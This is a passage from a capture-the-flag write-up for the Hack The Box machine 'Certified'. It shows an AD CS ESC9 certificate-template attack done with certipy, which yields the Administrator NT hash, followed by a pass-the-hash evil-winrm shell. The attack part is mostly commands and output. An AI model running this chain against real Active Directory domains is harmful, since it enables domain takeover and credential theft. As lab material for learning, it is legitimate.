[*] Successfully updated 'ca_operator'
  1. The vulnerable certificate can be requested as ca_operator but now with UPN Administrator.
kali@kali:~$ certipy req -username ca_operator \
    -hashes :b4b86f45c6018f1b664██████f45d8f2 \
    -ca 'certified-DC01-CA' \
    -template 'CertifiedAuthentication' \
    -target certified.htb \
    -dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
  1. The ca_operator’s UPN is changed back to default value so that nothing breaks.
kali@kali:~$ certipy account update \
    -username management_svc \
    -hashes :a091██████cdd4677c28b5a6a1295584 \
    -user ca_operator \
    -upn ca_operator@certified.htb \
    -target certified.htb \
    -dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : ca_operator@certified.htb
[*] Successfully updated 'ca_operator'
  1. Authenticating with the obtained certificate will get us administrator’s NTHASH
kali@kali:~$certipy auth -pfx administrator.pfx -dc-ip 10.10.11.41 -domain certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b496██████1751f708748f67e2d34

We get NTHASH for administrator@certified.htb aad3b435b51404eeaad3b435b51404ee:0d5b496██████1751f708748f67e2d34

Using evilwimrm to get shell as Administrator

kali@kali:~$ evil-winrm \
    -u administrator -H 0d5b496██████1751f708748f67e2d34 -i 10.10.11.41

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Get root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
745cb4c5d361690c85f██████15c59b2

  1. Default certificate templates: https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/certificate-template-concepts#default-certificate-templates ↩︎

  2. https://support.bloodhoundenterprise.io/hc/en-us/articles/17715215791899-Getting-started-with-BloodHound-Community-Edition ↩︎

  3. https://support.bloodhoundenterprise.io/hc/en-us/articles/17468450058267-Install-BloodHound-Community-Edition-with-Docker-Compose ↩︎

  4. https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#esc9-no-security-extension ↩︎

  5. https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-3-33efb00856ac ↩︎